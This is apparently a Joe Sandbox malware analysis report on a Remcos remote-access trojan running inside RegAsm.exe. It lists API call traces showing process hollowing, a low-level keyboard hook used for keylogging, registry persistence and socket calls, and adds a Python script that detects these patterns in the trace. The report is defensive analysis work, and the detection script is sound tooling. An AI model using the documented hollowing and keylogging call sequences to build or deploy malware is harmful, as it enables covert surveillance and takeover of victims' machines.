54474 40ecdf 54727 401f13 54474->54727 54904 40729b 98 API calls 54477->54904 54481 401f09 11 API calls 54483 40f3d7 54481->54483 54482 401f09 11 API calls 54484 40ecf3 54482->54484 54485 401f09 11 API calls 54483->54485 54486 401e65 22 API calls 54484->54486 54487 40f3e0 54485->54487 54489 40ecfc 54486->54489 54794 40dd7d 54487->54794 54492 401e65 22 API calls 54489->54492 54494 40ed16 54492->54494 54493 40f3ea 54495 401e65 22 API calls 54494->54495 54496 40ed30 54495->54496 54497 401e65 22 API calls 54496->54497 54498 40ed49 54497->54498 54499 40edb6 54498->54499 54501 401e65 22 API calls 54498->54501 54500 40edc5 54499->54500 54507 40ef41 ___scrt_get_show_window_mode 54499->54507 54502 40edce 54500->54502 54530 40ee4a ___scrt_get_show_window_mode 54500->54530 54505 40ed5e _wcslen 54501->54505 54503 401e65 22 API calls 54502->54503 54504 40edd7 54503->54504 54506 401e65 22 API calls 54504->54506 54505->54499 54508 401e65 22 API calls 54505->54508 54509 40ede9 54506->54509 54966 413733 RegOpenKeyExA 54507->54966 54510 40ed79 54508->54510 54512 401e65 22 API calls 54509->54512 54513 401e65 22 API calls 54510->54513 54514 40edfb 54512->54514 54515 40ed8e 54513->54515 54517 401e65 22 API calls 54514->54517 54906 40da6f 54515->54906 54516 40ef8c 54518 401e65 22 API calls 54516->54518 54519 40ee24 54517->54519 54520 40efb1 54518->54520 54524 401e65 22 API calls 54519->54524 54525 402093 28 API calls 54520->54525 54523 401f13 28 API calls 54526 40edad 54523->54526 54528 40ee35 54524->54528 54529 40efc3 54525->54529 54527 401f09 11 API calls 54526->54527 54527->54499 54964 40ce34 46 API calls _wcslen 54528->54964 54746 4137aa RegCreateKeyA 54529->54746 54736 413982 54530->54736 54534 40eede ctype 54539 401e65 22 API calls 54534->54539 54535 40ee45 54535->54530 54537 401e65 22 API calls 54538 40efe5 54537->54538 54541 43bb2c _strftime 40 API calls 54538->54541 54540 40eef5 54539->54540 54540->54516 54544 40ef09 54540->54544 54542 40eff2 54541->54542 54543 40effc 
54542->54543 54545 40f01f 54542->54545 54969 41ce2c 88 API calls ___scrt_get_show_window_mode 54543->54969 54546 401e65 22 API calls 54544->54546 54550 402093 28 API calls 54545->54550 54548 40ef12 54546->54548 54551 41bcef 28 API calls 54548->54551 54549 40f003 CreateThread 54549->54545 55449 41d4ee 10 API calls 54549->55449 54552 40f034 54550->54552 54553 40ef1e 54551->54553 54555 402093 28 API calls 54552->54555 54965 40f4af 114 API calls 54553->54965 54556 40f043 54555->54556 54558 41b580 80 API calls 54556->54558 54557 40ef23 54557->54516 54559 40ef2a 54557->54559 54560 40f048 54558->54560 54559->54441 54561 401e65 22 API calls 54560->54561 54562 40f054 54561->54562 54563 401e65 22 API calls 54562->54563 54564 40f066 54563->54564 54565 401e65 22 API calls 54564->54565 54566 40f086 54565->54566 54567 43bb2c _strftime 40 API calls 54566->54567 54568 40f093 54567->54568 54569 401e65 22 API calls 54568->54569 54570 40f09e 54569->54570 54571 401e65 22 API calls 54570->54571 54572 40f0af 54571->54572 54573 401e65 22 API calls 54572->54573 54574 40f0c4 54573->54574 54575 401e65 22 API calls 54574->54575 54576 40f0d5 54575->54576 54577 40f0dc StrToIntA 54576->54577 54752 409e1f 54577->54752 54580 401e65 22 API calls 54581 40f0f7 54580->54581 54582 40f103 54581->54582 54583 40f13c 54581->54583 54970 43455e 54582->54970 54585 401e65 22 API calls 54583->54585 54587 40f14c 54585->54587 54590 40f194 54587->54590 54591 40f158 54587->54591 54588 401e65 22 API calls 54589 40f11f 54588->54589 54592 40f126 CreateThread 54589->54592 54594 401e65 22 API calls 54590->54594 54593 43455e new 22 API calls 54591->54593 54592->54583 55447 41a045 113 API calls 2 library calls 54592->55447 54595 40f161 54593->54595 54596 40f19d 54594->54596 54597 401e65 22 API calls 54595->54597 54599 40f207 54596->54599 54600 40f1a9 54596->54600 54598 40f173 54597->54598 54603 40f17a CreateThread 54598->54603 54601 401e65 22 API calls 54599->54601 54602 401e65 22 API calls 54600->54602 54604 40f210 
Execution graph listing for the unpacked Remcos image in RegAsm.exe (node id, function address, API names and edge pairs). The interactive rendering in the original report does not survive extraction; the API nodes that appear in the listing are: GetComputerNameExW and GetUserNameW (41b69e), SetProcessDEPPolicy, CreateThread (several worker threads started from 40f1f6 onward), CreateMutexA with a GetLastError check (40d0ae), FindResourceA/LoadResource/LockResource/SizeofResource, RegOpenKeyExA, RegQueryValueExA, RegCreateKeyA, RegSetValueExA, RegDeleteValueW, RegCloseKey, DeleteFileW, Sleep, StrToIntA, GetLongPathNameW, GetCurrentProcess/IsWow64Process, GetLocaleInfoA, GetLastInputInfo/GetTickCount, GlobalMemoryStatusEx, WSAStartup, getaddrinfo/WSASetLastError, send, recv, WSAGetLastError, SetWindowsHookExA followed by a GetMessageA/TranslateMessage/DispatchMessageA loop (the hook thread at 40a30c), Sleep/GetForegroundWindow/GetWindowTextLengthW/GetWindowTextW (the active-window poll at 40ad79), CreateDirectoryW, GetFileAttributesW, SetFileAttributesW, PathFileExistsW, CreateFileW, GetFileSize, SetFilePointer, ReadFile, WriteFile, CloseHandle, EnterCriticalSection/LeaveCriticalSection/SetEvent/ResetEvent/WaitForSingleObjectEx, RaiseException, IsProcessorFeaturePresent, SetUnhandledExceptionFilter/UnhandledExceptionFilter/TerminateProcess (CRT abort path), and TerminateProcess/WaitForSingleObject followed by ExitProcess (the self-termination path at 40f8fb).

                                                                Control-flow Graph

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                • API String ID: 4236061018-3687161714
                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
Function 41812a-4184c7: GetModuleHandleA/GetProcAddress resolution of the four ntdll Zw* routines, then CreateProcessW, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory, NtCreateSection, NtUnmapViewOfSection, NtMapViewOfSection (target, then current process), WriteProcessMemory, Wow64SetThreadContext, ResumeThread; every failure edge leads to the VirtualFree / NtUnmapViewOfSection / NtClose / TerminateProcess cleanup block at 41847f.
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                • NtClose.NTDLL(?), ref: 00418332
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                • NtClose.NTDLL(?), ref: 004184A3
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                • API String ID: 3150337530-3035715614
                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
Function 40a2f3-40a3a1: GetModuleHandleA and SetWindowsHookExA, a GetLastError error path at 40a328 that formats the "Keylogger initialization failure" message, and the GetMessageA / TranslateMessage / DispatchMessageA message loop at 40a36e that keeps the hook alive.
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                                Strings
                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                • String ID: Keylogger initialization failure: error
                                                                • API String ID: 3219506041-952744263
                                                                • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
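The two call sequences above, the suspended CreateProcessW / NtUnmapViewOfSection / NtMapViewOfSection / Wow64SetThreadContext / ResumeThread chain in the function at 41812a and the SetWindowsHookExA call with idHook 0x0D (WH_KEYBOARD_LL) in the function at 40a2f3, are what an analyst wants pulled out of a trace like this automatically. The Python script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses the report's "• Api.MODULE(args), ref: addr" lines, decodes the relevant constants, and flags the hollowing chain, PAGE_EXECUTE_READWRITE section creation/mapping, and the low-level keyboard hook. The trace embedded in the script is constructed by copying lines from the two API lists above; treating the listed call-site addresses as the execution order is an assumption about the report format, not a runtime guarantee.

```python
import re
from dataclasses import dataclass

# Constructed sample input: API lines copied from the two functions above
# (hollowing routine at 0x41812a, keylogger loop at 0x40a2f3).
TRACE = """
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
• ResumeThread.KERNEL32(?), ref: 00418470
• GetLastError.KERNEL32 ref: 004184B5
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
"""

# One report line: optional bullet, optional "Part of subcall function X:",
# Api.MODULE, optional (args), then "ref: <call-site address>".
LINE_RE = re.compile(
    r"•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

CREATE_SUSPENDED = 0x00000004   # CreateProcess dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40
WH_KEYBOARD_LL = 13             # SetWindowsHookEx idHook 0x0D


@dataclass
class Call:
    api: str
    module: str
    args: list      # raw hex strings; "?" = value not resolved by the sandbox
    ref: int        # call-site address


def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def arg_int(call, idx):
    """Argument idx as an int, or None when it is missing or unresolved ('?')."""
    if idx < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]+", call.args[idx]):
        return int(call.args[idx], 16)
    return None


# Stages of process hollowing and the APIs that implement each one.
HOLLOWING_STAGES = ("create_suspended", "unmap", "map", "set_context", "resume")
STAGE_OF = {
    "CreateProcessA": "create_suspended", "CreateProcessW": "create_suspended",
    "NtUnmapViewOfSection": "unmap", "ZwUnmapViewOfSection": "unmap",
    "NtMapViewOfSection": "map", "ZwMapViewOfSection": "map",
    "WriteProcessMemory": "map",   # classic variant writes the image instead of mapping it
    "SetThreadContext": "set_context", "Wow64SetThreadContext": "set_context",
    "ResumeThread": "resume", "NtResumeThread": "resume",
}


def find_process_hollowing(calls):
    """Refs of the first complete hollowing chain (create suspended, unmap,
    map/write, rewrite thread context, resume) in listed order, else None."""
    hits = {}
    for c in calls:
        stage = STAGE_OF.get(c.api)
        if stage is None or stage in hits:
            continue
        if stage == "create_suspended":
            flags = arg_int(c, 5)          # dwCreationFlags, 6th parameter
            if flags is None or not flags & CREATE_SUSPENDED:
                continue
        elif "create_suspended" not in hits:
            continue                       # later stages only count after the create
        hits[stage] = c.ref
    if len(hits) < len(HOLLOWING_STAGES):
        return None
    refs = [hits[s] for s in HOLLOWING_STAGES]
    return refs if refs == sorted(refs) else None


def find_rwx_sections(calls):
    """Refs where a section is created or mapped PAGE_EXECUTE_READWRITE."""
    refs = []
    for c in calls:
        if c.api in ("NtCreateSection", "ZwCreateSection") and arg_int(c, 4) == PAGE_EXECUTE_READWRITE:
            refs.append(c.ref)             # SectionPageProtection, 5th parameter
        elif c.api in ("NtMapViewOfSection", "ZwMapViewOfSection") and arg_int(c, 9) == PAGE_EXECUTE_READWRITE:
            refs.append(c.ref)             # Win32Protect, 10th parameter
    return refs


def find_keyboard_hooks(calls):
    """Refs of SetWindowsHookEx calls that install a low-level keyboard hook."""
    return [c.ref for c in calls
            if c.api in ("SetWindowsHookExA", "SetWindowsHookExW")
            and arg_int(c, 0) == WH_KEYBOARD_LL]


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    print("hollowing chain:", [hex(r) for r in find_process_hollowing(calls) or []])
    print("RWX sections:   ", [hex(r) for r in find_rwx_sections(calls)])
    print("keyboard hooks: ", [hex(r) for r in find_keyboard_hooks(calls)])
```

Against the embedded trace the hollowing chain resolves to call sites 418252, 4182F6, 418316, 418463 and 418470, the RWX check fires on the NtCreateSection at 4182CE and the NtMapViewOfSection at 418316, and the hook check fires on 40A31C. Unresolved "?" arguments are deliberately treated as unknown rather than zero, so a CreateProcess whose flags the sandbox did not capture is never counted as suspended.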

Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
Function 100010f1-100011e9: lstrlenW / lstrcatW path assembly, then a FindFirstFileW / FindNextFileW loop that calls 10001000 per entry and ends with FindClose.
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                • String ID:
                                                                • API String ID: 1083526818-0
                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                APIs
                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                • String ID:
                                                                • API String ID: 3950776272-0
                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                APIs
                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                • String ID: 5.1.1 Pro$override$pth_unenc
                                                                • API String ID: 2281282204-2344886030
                                                                • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
